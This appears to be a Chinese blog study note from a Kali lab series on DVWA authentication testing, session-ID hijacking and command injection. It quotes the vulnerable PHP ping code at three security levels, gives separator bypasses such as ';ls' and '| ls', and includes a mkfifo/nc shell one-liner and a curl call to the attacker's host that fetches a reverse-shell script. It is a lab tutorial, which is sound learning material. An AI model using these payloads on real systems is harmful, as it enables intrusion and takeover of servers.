Kali学习笔记30:身份认证与命令执行漏洞

时间:2023-03-08 17:31:21
Kali学习笔记30:身份认证与命令执行漏洞

文章的格式也许不是很好看,也没有什么合理的顺序

完全是想到什么写一些什么,但各个方面都涵盖到了

能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道

实验环境:

Kali机器:192.168.163.132

Metasploitable靶机:192.168.163.129

首先我们要尝试身份认证(登陆):

就拿DVWA来测试

启动Burpsuite,访问DVWA:

假设我们现在不知道这里的用户名和密码是多少:

现在我先把密码故意输错:

Kali学习笔记30:身份认证与命令执行漏洞

发现DVWA只是告诉我登陆失败,却并没有告诉我哪里失败,为什么会失败

说明DVWA在身份认证方面还做得不错,如果是一些没有安全意识的程序猿,可能会返回密码错误的界面

然后我们输入正确的密码,用Burp进行比较:

发现返回的结果除了重定向页面和时间基本一致:说明DVWA做的比较好

Kali学习笔记30:身份认证与命令执行漏洞

如果正确和失败返回的结果有不同之处,那么我们就可以利用这里的漏洞来爆破

但是,如果我们想尽办法还是登陆不上去呢?

这时候可以想象Cookie方面有没有可以利用的?

如何获取SessionID:

第一种:XSS,这种后面具体介绍

第二种:通过Get或者Post传递的SessionID

做得不好的Web应用,有可能直接把SessionID放在URL上,利用社会工程学获取后直接就可以利用

稍微有点安全意识的程序猿,会把SessionID利用POST提交,利用嗅探还是可以获取:

示例:

我用Windows机器作为正常的管理员登陆Metasploitable:

登陆之后,我查看到Cookie里面的SessionID:

这里是做演示的,具体的如何获取SessionID我会在后边的过程进行演示

Kali学习笔记30:身份认证与命令执行漏洞

然后我就可以用这里的Cookie使Kali机器直接以Windows机器的身份来登陆

可以利用Kali的Firefox的Cookie Manager插件进行Cookie编辑:

Kali学习笔记30:身份认证与命令执行漏洞

当然也可以复制出来SessionID,然后我把它组装好

让Kali使用Burp发送

Kali学习笔记30:身份认证与命令执行漏洞

同时:我们需要更仔细地关注SessionID,它的有效时间,规律等

比如:

点击logout后,sessionID是否会消失

关闭浏览器,sessionID是永久小时还是只改变了状态

然而SessionID其实本质是算法生成的,那么我们就可以使用Burp的Sequence模块来测试

我前面的文章就有提到过,然后就可以针对来生成下一个SessionID,从而做很多的事情

下面,假设我们已经登陆进入了目标:

接下来就可以用我前面文章中写到的一些自动化扫描工具进行Web漏洞扫描

或者继续进行手动挖掘:

下面来看第二种漏洞:

命令执行:

我先把DVWA的安全性调到最低

这里有一个应用:输入一个IP地址,Ping目标,返回结果

我先演示下这里的漏洞,下面具体说:

我尝试输入ls命令:没有反应

Kali学习笔记30:身份认证与命令执行漏洞

那么ls加入分号呢?

结果执行了ls命令

Kali学习笔记30:身份认证与命令执行漏洞

我用Burp来对比两次的请求:

发送请求的时候对分号进行了URL编码

Kali学习笔记30:身份认证与命令执行漏洞

那么,我们如何去发现命令执行漏洞呢?

首先,我们要了解很多的常见漏洞类型

当有一个可以提交数据的表单时候,就要联想到是否有可能发现能够利用的漏洞?

就比如说是这里:

调用操作系统Ping命令而且要返回值,我想到如果用PHP实现比较复杂

那么有可能是目标直接条用系统命令吗?如果是偷懒的程序猿有可能会直接来调用系统命令

首先我输入正常的IP,看看结果:

Kali学习笔记30:身份认证与命令执行漏洞

返回值竟然和系统直接Ping命令格式一致

Kali学习笔记30:身份认证与命令执行漏洞

于是我更进一步可以确认,这里很有可能有命令执行漏洞

首先尝试直接ls命令,上边尝试了,但是没有结果

那我为什么后边又加入了;呢?

然后结合Linux系统的知识:如果想一次执行多条命令,可以使用;或者|

于是,我考虑加入“;”之后再输入命令:果然

Kali学习笔记30:身份认证与命令执行漏洞

实际中如果发现了这种漏洞,就可以用Burp发送提权命令等等

查看源码:

 <?php

if( isset( $_POST[ 'submit' ] ) ) {

    $target = $_REQUEST[ 'ip' ];

    // Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) { $cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>'; } else { $cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.$cmd.'</pre>'; } }
?>

简单分析:获取的变量直接给Target复制,然后执行系统命令,存在漏洞

接下来把DVWA的安全性调到中:

这时候如果输入;ls或者&&符号时候,并不会执行系统命令

查看源码:

 <?php

if( isset( $_POST[ 'submit'] ) ) {

    $target = $_REQUEST[ 'ip' ];

    // Remove any of the charactars in the array (blacklist).
$substitutions = array(
'&&' => '',
';' => '',
); $target = str_replace( array_keys( $substitutions ), $substitutions, $target ); // Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) { $cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>'; } else { $cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.$cmd.'</pre>'; }
} ?>

仔细观察后发现原来是把“;”和“&&”特殊符号都变成空字符了(&&表示前一个命令执行成功后执行后一个命令)

然而对吗漏掉了|这个符号,如果输入|ls还是可以的

或者使用一个&,Linux中使用一个&代表两条命令一起执行:

127.0.0.1 & ls

Kali学习笔记30:身份认证与命令执行漏洞

或者使用两个|,即||,也可以作到,不过需要前一个命令执行失败,再执行后一个命令:

Kali学习笔记30:身份认证与命令执行漏洞

那么将DVWA高安全级别呢?

尝试了各种各样的字符后发现还是没有漏洞

查看源码:

<?php

if( isset( $_POST[ 'submit' ] ) ) {

    $target = $_REQUEST["ip"];

    $target = stripslashes( $target );

    // Split the IP into 4 octects
$octet = explode(".", $target); // Check IF each octet is an integer
if ((is_numeric($octet[0])) && (is_numeric($octet[1])) && (is_numeric($octet[2])) && (is_numeric($octet[3])) && (sizeof($octet) == 4) ) { // If all 4 octets are int's put the IP back together.
$target = $octet[0].'.'.$octet[1].'.'.$octet[2].'.'.$octet[3]; // Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) { $cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>'; } else { $cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.$cmd.'</pre>'; } } else {
echo '<pre>ERROR: You have entered an invalid IP</pre>';
} } ?>

它这里是如何判断的呢?

收到的数据然后进行拆分,拆分后四个部分如果是数字,再进行组合,生成一个IP

就算了系统命令用.来分割,但是由于不是数字,不会重组

所以调整到高安全级别基本就是安全的一个应用了

回到刚才在低安全级别下的状态:

我已经找到这里有命令执行的漏洞了

那么怎么做进一步的操作呢?

比如:开启

mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp  > /tmp/pipe

输入后使用nc连接:得到shell

Kali学习笔记30:身份认证与命令执行漏洞

但是注意:这里获得的权限不是root

最后看一个有趣的现象:

本意:

把Kali系统的反连Shell脚本复制到Apache服务器,重命名为1.php,是目标访问1.php从而获得shell

Kali学习笔记30:身份认证与命令执行漏洞

对反连shell进行编辑:设置号反连的IP,比如这里我设置的是Kali机器

Kali学习笔记30:身份认证与命令执行漏洞

然后启动Apache服务:

Kali学习笔记30:身份认证与命令执行漏洞

这时候命令执行的表单填写内容:

;curl http://192.168.163.132/1.php

提交前nc监听端口,点击按钮,然后获取shell:

Kali学习笔记30:身份认证与命令执行漏洞

结果我仔细观察后发现获取的是我Kali本机的shell!!

原因:

1.php本质是存在于Kali机器的,所以访问1.php就会让Kali机器把shell发出,再让本机收到shell

上一篇中我把1.php的内容复制出来,用Burp发送出去,1.php的内容是在目标机器上执行的,与这种情况不一样

所以要注意:

反连shell脚本在哪个机器就会反弹哪个机器的shell